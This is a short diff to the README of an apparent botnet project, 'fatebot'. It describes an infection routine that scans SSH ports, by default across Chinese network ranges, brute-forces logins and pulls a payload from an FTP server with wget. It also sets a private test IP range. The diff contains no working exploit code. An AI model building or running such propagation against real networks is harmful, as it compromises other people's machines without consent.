m4pol/fatebot/README.md

 # Infect
 The infect function of this botnet is scanning by default SSH port<strong>(Scan on range of CHN network by default.
 You can add more or change it, If you want.)</strong>
 and login by Brute-force attack.
-This botnet will use "curl" to get payload from FTP server, So...
+This botnet will use "wget" to get payload from FTP server, So...
 Please prepair your FTP server first, It's very important for infect process.

-<strong>I scan on my private netowrk in SSH range, And comment a function of running session.(That's why bot is not join The server.)</strong>
+<strong>I scan on my private netowrk in SSH range.(That's why it's scan and login at The same ip address.)</strong>

+	my_ssh_ip = "192.168.57"
+	ipGen = append(ipGen, genRange(134, 133), ".")

 <img src="assets/scanprocess.png" alt="SSH scan">

 # Add more IP range